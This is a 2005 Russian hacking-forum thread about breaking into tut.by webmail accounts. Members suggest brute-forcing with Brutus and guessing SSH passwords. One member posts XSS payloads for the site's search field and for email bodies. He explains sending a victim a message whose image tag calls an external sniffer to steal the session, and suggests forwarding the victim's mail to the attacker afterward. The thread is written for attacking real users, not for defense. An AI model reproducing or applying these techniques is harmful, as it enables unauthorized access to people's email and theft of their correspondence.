HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Перезагрузить страницу tut.by
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

tut.by
  #1  
Старый 12.10.2005, 20:15
Tommi
Новичок
Регистрация: 10.10.2005
Сообщений: 2
С нами: 10832829

Репутация: 0
По умолчанию tut.by
Народ кто-нибудь знает как ломать ящики на tut.by?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 12.10.2005, 21:21
Nexwill
Участник форума
Регистрация: 02.08.2005
Сообщений: 172
С нами: 10932866

Репутация: 100
По умолчанию
Brutus в руки и погнал......
 
Ответить с цитированием

  #3  
Старый 12.10.2005, 22:11
Tommi
Новичок
Регистрация: 10.10.2005
Сообщений: 2
С нами: 10832829

Репутация: 0
По умолчанию
Брутус - это и ёжику понятно. А как-нить поумнее можно?
 
Ответить с цитированием

  #4  
Старый 13.10.2005, 22:04
ais+
Новичок
Регистрация: 17.08.2005
Сообщений: 16
С нами: 10911738

Репутация: 0
По умолчанию
Все сайты, которые они хостят, лежат вмесе с их мыльницей на одном серве.
ЗЫ для каждого хостящегося есть ssh. Пассы на ssh обычно:
логин - низвание сайта без домена, а пароль комбинация 9 чисел и букв.
Там дохрена сайтов с ipb и phpbb помойму до сих пор валяется.
 
Ответить с цитированием

Хм..
  #5  
Старый 16.10.2005, 09:15
Dronga
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
С нами: 10978946

Репутация: 714


Arrow Хм..
Умнее... Ищи xss. Есть пасивная в поле поискового запроса, прямо на главной, там в теге title ничего не фильтруется. xss выглядит так:
Код:
</title><script>alert('Antichat (c)!')</script>
Может пригодиться..
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
Последний раз редактировалось Dronga; 16.10.2005 в 09:19..
 
Ответить с цитированием

Взлом tut.by
  #6  
Старый 16.10.2005, 10:03
Dronga
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
С нами: 10978946

Репутация: 714


Talking Взлом tut.by
Ну чтож.. На редкость дырявый портал. За 20 минут было обнаружено несколько активных xss в теле письма. Вот пример:

Код:
<style type="text/css">@import url(javascript:alert('Antichat have it!'));</style>
Работает в IE. Поскольку для аутентификации куки не используются, то взлом упрощается до нельзя. Всего навсего требуется сессия. Отправляешь жертве такую тему:


Код:
Привет, как дела?
<img src="http://antichat.ru/cgi-bin/s.jpg">
и подписываешься на снифер. ВСЁ! Ящик твой.

Палева - 0, эффективность - 100%, жаль пароля не будет) Очень рекомендую использовать при этом программу XSS Tester от LittleLamer. Можно скачать с этой странички.

Если прибавишь мне репутацию, то я не обижусь.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
Последний раз редактировалось Dronga; 16.10.2005 в 13:45..
 
Ответить с цитированием

  #7  
Старый 17.10.2005, 02:01
limbonic
Познающий
Регистрация: 05.12.2003
Сообщений: 54
С нами: 11805566

Репутация: 0
По умолчанию
Мда ....осталось только чтобы жертва почту првоеряла через инет =))
 
Ответить с цитированием

  #8  
Старый 18.10.2005, 13:43
Dronga
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
С нами: 10978946

Репутация: 714


Talking
Только осталось... Так говоришь, как будто это делают единицы) По мне так, пускай лучше меня взламает неизвестный мне тип, чем сосед по локалке, который отснифал пасс по POP3... Портал вообще безбашенный в плане безопасности.. Куда смотрят...
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
Последний раз редактировалось Dronga; 18.10.2005 в 13:46..
 
Ответить с цитированием

  #9  
Старый 18.10.2005, 15:09
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
С нами: 10915586

Репутация: 54
По умолчанию
А если отснифовать куки с почтовика-то нельзя будет полностью забрать этот ящик себе? Т.е. сменить пароль?
 
Ответить с цитированием

  #10  
Старый 19.10.2005, 03:16
Dronga
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
С нами: 10978946

Репутация: 714


Arrow
Цитата:
Сообщение от Ван  
А если отснифовать куки с почтовика-то нельзя будет полностью забрать этот ящик себе? Т.е. сменить пароль?
Нет, полностью забрать его себе не удастся, только полный доступ к ящику на время сессии. Если ты что-либо хочешь сотворить с ящиком, в т.ч. сменить пароль, но у тебя запрашивают старый пароль, то ничего тебе не светит... Пароль никаким печеньем не заменишь. В подобных случаях советую пользоваться альтернативными методами, как то настройка пересылки с ящика жертвы на ваш... ну и подобные трюки.
Цитата:
Сообщение от Meister  
А я присылаю себе картинку от снифера, но не вижу себя в логах. Уже на нескольких почтах делал. Что-то изменили?
Всё что описано выше актуально исключительно для tut.by на момент написания, я проверял лично. Сейчас не знаю.
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.